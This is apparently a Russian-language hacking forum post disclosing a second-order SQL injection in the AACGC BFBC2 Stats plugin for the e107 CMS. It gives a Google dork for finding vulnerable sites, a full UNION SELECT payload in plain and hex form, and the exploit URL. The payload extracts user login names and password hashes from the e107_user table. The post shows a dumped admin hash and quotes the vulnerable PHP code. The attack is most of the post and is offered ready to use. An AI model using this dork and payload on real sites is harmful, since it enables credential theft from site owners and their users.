AACGC BFBC2 Stats 1.5 09 May10 - добавлено!
гугл- inurl:e107_plugins/aacgc_bfbcstats
http://plugins.e107.org/e107_plugins...?artifact.757# - скачано
2-d order inj
Никаких условий.
1 принтабельное поле. В первом запросе 2 поля.
хексим и тулим в первый атрибут :
' union select 1,concat_ws(user_loginname,':',user_password),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31 from e107_user limit 0,1--
0x2720756e696f6e2073656c65637420312c636f6e6361745f 777328757365725f6c6f67696e6e616d652c273a272c757365 725f70617373776f7264292c332c342c352c362c372c382c39 2c31302c31312c31322c31332c31342c31352c31362c31372c 31382c31392c32302c32312c32322c32332c32342c32352c32 362c32372c32382c32392c33302c33312066726f6d20653130 375f75736572206c696d697420302c312d2d20
Вот так:
http://e107/e107_plugins/aacgc_bfbcs...Details.php?.1 union select 0x2720756e696f6e2073656c65637420312c636f6e6361745f 777328757365725f6c6f67696e6e616d652c273a272c757365 725f70617373776f7264292c332c342c352c362c372c382c39 2c31302c31312c31322c31332c31342c31352c31362c31372c 31382c31392c32302c32312c32322c32332c32342c32352c32 362c32372c32382c32392c33302c33312066726f6d20653130 375f75736572206c696d697420302c312d2d20,2 from e107_user limit 0,1--
На выходе:
Цитата:
:admin21232f297a57a5a743894a0e4a801fc3 ()
|
Сори, ":" нетуда впихнул
Member_Details.php в корене плагина.
PHP код:
...require_once("../../class2.php");
require_once(HEADERF);
if (e_QUERY) {
$tmp = explode('.', e_QUERY);
$action = $tmp[0];
$sub_action = $tmp[1];
$id = $tmp[2];
unset($tmp);
}
if ($pref['bfbc_enable_gold'] == "1"){$gold_obj = new gold();}
//---------------------------------------------------------------
$title .= "Battlefield Bad Company 2 Member Details";
//---------------------------------------------------------------
$sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action","");
$row = $sql->db_Fetch();
$sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'","");
$row2 = $sql2->db_Fetch();
if ($pref['bfbc_enable_gold'] == "1"){
$username = "".$gold_obj->show_orb($row2['user_id'])."";}
else
{$username = "".$row2['user_name']."";}
if ($pref['bfbc_enable_avatar'] == "1"){
if ($row2['user_image'] == "")
{$avatar = "";}
else...